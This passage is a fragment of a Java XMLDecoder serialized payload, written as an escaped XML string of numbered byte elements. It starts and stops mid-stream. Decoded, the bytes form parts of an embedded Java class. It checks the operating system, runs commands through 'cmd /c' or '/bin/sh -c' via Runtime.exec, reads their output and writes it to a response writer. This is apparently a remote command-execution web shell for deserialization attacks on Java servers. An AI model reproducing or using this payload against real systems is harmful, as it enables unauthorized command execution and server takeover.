index=\"2499\"><byte>109</byte></void><void index=\"2500\"><byte>59</byte></void><void index=\"2501\"><byte>41</byte></void><void index=\"2502\"><byte>86</byte></void><void index=\"2503\"><byte>12</byte></void><void index=\"2504\"><byte>0</byte></void><void index=\"2505\"><byte>97</byte></void><void index=\"2506\"><byte>0</byte></void><void index=\"2507\"><byte>98</byte></void><void index=\"2508\"><byte>10</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void index=\"2986\"><byte>0</byte></void><void index=\"2987\"><byte>-115</byte></void><void index=\"2988\"><byte>0</byte></void><void index=\"2989\"><byte>-112</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>42</byte></void><void index=\"2993\"><byte>40</byte></void><void index=\"2994\"><byte>76</byte></void><void index=\"2995\"><byte>106</byte></void><void index=\"2996\"><byte>97</byte></void><void index=\"2997\"><byte>118</byte></void><void index=\"2998\"><byte>97</byte></void><void index=\"2999\"><byte>47</byte></void><void index=\"3000\"><byte>105</byte></void><void index=\"3001\"><byte>111</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>73</byte></void><void index=\"3004\"><byte>110</byte></void><void index=\"3005\"><byte>112</byte></void><void index=\"3006\"><byte>117</byte></void><void index=\"3007\"><byte>116</byte></void><void index=\"3008\"><byte>83</byte></void><void index=\"3009\"><byte>116</byte></void><void index=\"3010\"><byte>114</byte></void><void index=\"3011\"><byte>101</byte></void><void index=\"3012\"><byte>97</byte></void><void index=\"3013\"><byte>109</byte></void><void index=\"3014\"><byte>59</byte></void><void index=\"3015\"><byte>76</byte></void><void index=\"3016\"><byte>106</byte></void><void index=\"3017\"><byte>97</byte></void><void index=\"3018\"><byte>118</byte></void><void index=\"3019\"><byte>97</byte></void><void index=\"3020\"><byte>47</byte></void><void index=\"3021\"><byte>108</byte></void><void index=\"3022\"><byte>97</byte></void><void index=\"3023\"><byte>110</byte></void><void index=\"3024\"><byte>103</byte></void><void index=\"3025\"><byte>47</byte></void><void index=\"3026\"><byte>83</byte></void><void index=\"3027\"><byte>116</byte></void><void index=\"3028\"><byte>114</byte></void><void index=\"3029\"><byte>105</byte></void><void index=\"3030\"><byte>110</byte></void><void index=\"3031\"><byte>103</byte></void><void index=\"3032\"><byte>59</byte></void><void index=\"3033\"><byte>41</byte></void><void index=\"3034\"><byte>86</byte></void><void index=\"3035\"><byte>12</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>10</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>-110</byte></void><void index=\"3040\"><byte>10</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>-117</byte></void><void index=\"3043\"><byte>0</byte></void><void index=\"3044\"><byte>-109</byte></void><void index=\"3045\"><byte>1</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>19</byte></void><void index=\"3048\"><byte>40</byte></void><void index=\"3049\"><byte>76</byte></void><void index=\"3050\"><byte>106</byte></void><void index=\"3051\"><byte>97</byte></void><void index=\"3052\"><byte>118</byte></void><void index=\"3053\"><byte>97</byte></void><void index=\"3054\"><byte>47</byte></void><void index=\"3055\"><byte>105</byte></void><void index=\"3056\"><byte>111</byte></void><void index=\"3057\"><byte>47</byte></void><void index=\"3058\"><byte>82</byte></void><void index=\"3059\"><byte>101</byte></void><void index=\"3060\"><byte>97</byte></void><void index=\"3061\"><byte>100</byte></void><void index=\"3062\"><byte>101</byte></void><void index=\"3063\"><byte>114</byte></void><void index=\"3064\"><byte>59</byte></void><void index=\"3065\"><byte>41</byte></void><void index=\"3066\"><byte>86</byte></void><void index=\"3067\"><byte>12</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>10</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>-107</byte></void><void index=\"3072\"><byte>10</byte></void><void index=\"3073\"><byte>0</byte></void><void index=\"3074\"><byte>-119</byte></void><void index=\"3075\"><byte>0</byte></void><void index=\"3076\"><byte>-106</byte></void><void index=\"3077\"><byte>1</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>0</byte></void><void index=\"3080\"><byte>8</byte></void><void index=\"3081\"><byte>0</byte></void><void index=\"3082\"><byte>-104</byte></void><void index=\"3083\"><byte>1</byte></void><void index=\"3084\"><byte>0</byte></void><void index=\"3085\"><byte>8</byte></void><void index=\"3086\"><byte>114</byte></void><void index=\"3087\"><byte>101</byte></void><void index=\"3088\"><byte>97</byte></void><void index=\"3089\"><byte>100</byte></void><void index=\"3090\"><byte>76</byte></void><void index=\"3091\"><byte>105</byte></void><void index=\"3092\"><byte>110</byte></void><void index=\"3093\"><byte>101</byte></void><void index=\"3094\"><byte>12</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>-102</byte></void><void index=\"3097\"><byte>0</byte></void><void index=\"3098\"><byte>90</byte></void><void index=\"3099\"><byte>10</byte></void><void index=\"3100\"><byte>0</byte></void><void index=\"3101\"><byte>-119</byte></void><void index=\"3102\"><byte>0</byte></void><void index=\"3103\"><byte>-101</byte></void><void index=\"3104\"><byte>1</byte></void><void index=\"3105\"><byte>0</byte></void><void index=\"3106\"><byte>9</byte></void><void index=\"3107\"><byte>103</byte></void><void index=\"3108\"><byte>101</byte></void><void index=\"3109\"><byte>116</byte></void><void index=\"3110\"><byte>87</byte></void><void index=\"3111\"><byte>114</byte></void><void index=\"3112\"><byte>105</byte></void><void index=\"3113\"><byte>116</byte></void><void index=\"3114\"><byte>101</byte></void><void index=\"3115\"><byte>114</byte></void><void index=\"3116\"><byte>1</byte></void><void index=\"3117\"><byte>0</byte></void><void index=\"3118\"><byte>23</byte></void><void index=\"3119\"><byte>40</byte></void><void index=\"3120\"><byte>41</byte></void><void index=\"3121\"><byte>76</byte></void><void index=\"3122\"><byte>106</byte></void><void index=\"3123\"><byte>97</byte></void><void index=\"3124\"><byte>118</byte></void><void index=\"3125\"><byte>97</byte></void><void index=\"3126\"><byte>47</byte></void><void index=\"3127\"><byte>105</byte></void><void index=\"3128\"><byte>111</byte></void><void index=\"3129\"><byte>47</byte></void><void index=\"3130\"><byte>80</byte></void><void index=\"3131\"><byte>114</byte></void><void index=\"3132\"><byte>105</byte></void><void index=\"3133\"><byte>110</byte></void><void index=\"3134\"><byte>116</byte></void><void index=\"3135\"><byte>87</byte></void><void index=\"3136\"><byte>114</byte></void><void index=\"3137\"><byte>105</byte></void><void index=\"3138\"><byte>116</byte></void><void index=\"3139\"><byte>101</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>59</byte></void><void index=\"3142\"><byte>12</byte></void><void index=\"3143\"><byte>0</byte></void><void index=\"3144\"><byte>-99</byte></void><void index=\"3145\"><byte>0</byte></void><void index=\"3146\"><byte>-98</byte></void><void index=\"3147\"><byte>10</byte></void><void index=\"3148\"><byte>0</byte></void><void index=\"3149\"><byte>69</byte></void><void index=\"3150\"><byte>0</byte></void><void index=\"3151\"><byte>-97</byte></void><void index=\"3152\"><byte>1</byte></void><void index=\"3153\"><byte>0</byte></void><void index=\"3154\"><byte>19</byte></void><void index=\"3155\"><byte>106</byte></void><void index=\"3156\"><byte>97</byte></void><void index=\"3157\"><byte>118</byte></void><void index=\"3158\"><byte>97</byte></void><void index=\"3159\"><byte>47</byte></void><void index=\"3160\"><byte>105</byte></void><void index=\"3161\"><byte>111</byte></void><void index=\"3162\"><byte>47</byte></void><void index=\"3163\"><byte>80</byte></void><void index=\"3164\"><byte>114</byte></void><void index=\"3165\"><byte>105</byte></void><void index=\"3166\"><byte>110</byte></void><void index=\"3167\"><byte>116</byte></void><void index=\"3168\"><byte>87</byte></void><void index=\"3169\"><byte>114</byte></void><void index=\"3170\"><byte>105</byte></void><void index=\"3171\"><byte>116</byte></void><void index=\"3172\"><byte>101</byte></void><void index=\"3173\"><byte>114</byte></void><void index=\"3174\"><byte>7</byte></void><void index=\"3175\"><byte>0</byte></void><void index=\"3176\"><byte>-95</byte></void><void index=\"3177\"><byte>1</byte></void><void index=\"3178\"><byte>0</byte></void><void index=\"3179\"><byte>5</byte></void><void index=\"3180\"><byte>119</byte></void><void index=\"3181\"><byte>114</byte></void><void index=\"3182\"><byte>105</byte></void><void index=\"3183\"><byte>116</byte></void><void index=\"3184\"><byte>101</byte></void><void index=\"3185\"><byte>12</byte></void><void index=\"3186\"><byte>0</byte></void><void index=\"3187\"><byte>-93</byte></void><void index=\"3188\"><byte>0</byte></void><void index=\"3189\"><byte>71</byte></void><void index=\"3190\"><byte>10</byte></void><void index=\"3191\"><byte>0</byte></void><void index=\"3192\"><byte>-94</byte></void><void index=\"3193\"><byte>0</byte></void><void index=\"3194\"><byte>-92</byte></void><void index=\"3195\"><byte>1</byte></void><void index=\"3196\"><byte>0</byte></void><void index=\"3197\"><byte>19</byte></void><void index=\"3198\"><byte>106</byte></void><void index=\"3199\"><byte>97</byte></void><void index=\"3200\"><byte>118</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>47</byte></void><void index=\"3203\"><byte>108</byte></void><void index=\"3204\"><byte>97</byte></void><void index=\"3205\"><byte>110</byte></void><void index=\"3206\"><byte>103</byte></void><void index=\"3207\"><byte>47</byte></void><void index=\"3208\"><byte>69</byte></void><void index=\"3209\"><byte>120</byte></void><void index=\"3210\"><byte>99</byte></void><void index=\"3211\"><byte>101</byte></void><void index=\"3212\"><byte>112</byte></void><void index=\"3213\"><byte>116</byte></void><void index=\"3214\"><byte>105</byte></void><void index=\"3215\"><byte>111</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>7</byte></void><void index=\"3218\"><byte>0</byte></void><void index=\"3219\"><byte>-90</byte></void><void index=\"3220\"><byte>1</byte></void><void index=\"3221\"><byte>0</byte></void><void index=\"3222\"><byte>3</byte></void><void index=\"3223\"><byte>111</byte></void><void index=\"3224\"><byte>117</byte></void><void index=\"3225\"><byte>116</byte></void><void index=\"3226\"><byte>1</byte></void><void index=\"3227\"><byte>0</byte></void><void index=\"3228\"><byte>21</byte></void><void index=\"3229\"><byte>76</byte></void><void index=\"3230\"><byte>106</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>118</byte></void><void index=\"3233\"><byte>97</byte></void><void index=\"3234\"><byte>47</byte></void><void index=\"3235\"><byte>105</byte></void><void index=\"3236\"><byte>111</byte></void><void index=\"3237\"><byte>47</byte></void><void index=\"3238\"><byte>80</byte></void><void index=\"3239\"><byte>114</byte></void><void index=\"3240\"><byte>105</byte></void><void index=\"3241\"><byte>110</byte></void><void index=\"3242\"><byte>116</byte></void><void index=\"3243\"><byte>83</byte></void><void index=\"3244\"><byte>116</byte></void><void index=\"3245\"><byte>114</byte></void><void index=\"3246\"><byte>101</byte></void><void 